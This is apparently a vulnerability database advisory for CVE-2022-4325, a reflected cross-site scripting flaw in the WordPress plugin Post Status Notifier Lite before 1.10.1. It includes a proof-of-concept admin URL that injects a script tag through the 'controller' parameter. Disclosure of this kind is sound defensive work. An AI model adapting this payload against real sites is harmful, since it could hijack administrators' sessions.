Lucene search
CydaveWPEX-ID:5B983C48-6B05-47CF-85CB-28BBEEC17395HistoryDec 15, 2022 - 12:00 a.m.
Post Status Notifier Lite < 1.10.1 - Reflected XSS
2022-12-1500:00:00
cydave
59
post status notifier lite
reflected xss
exploit
url
logged in user
high privilege
0.001 Low
EPSS
Percentile
50.1%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.
Make a logged in high privilege user such as admin open the URL below
https://example.com/wp-admin/options-general.php?page=post-status-notifier-lite&controller=<script>alert(`xss`)</script>Related
cve
cve
CVE-2022-4325
2023-01-09 23:15:27
wpvulndb
wpvulndb
Post Status Notifier Lite < 1.10.1 - Reflected XSS
2022-12-15 00:00:00
nuclei
nuclei
WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting
2023-03-18 22:07:09
cvelist
cvelist
CVE-2022-4325 Post Status Notifier Lite < 1.10.1 - Reflected XSS
2023-01-09 22:13:46
nvd
nvd
CVE-2022-4325
2023-01-09 23:15:27
prion
prion
Cross site scripting
2023-01-09 23:15:00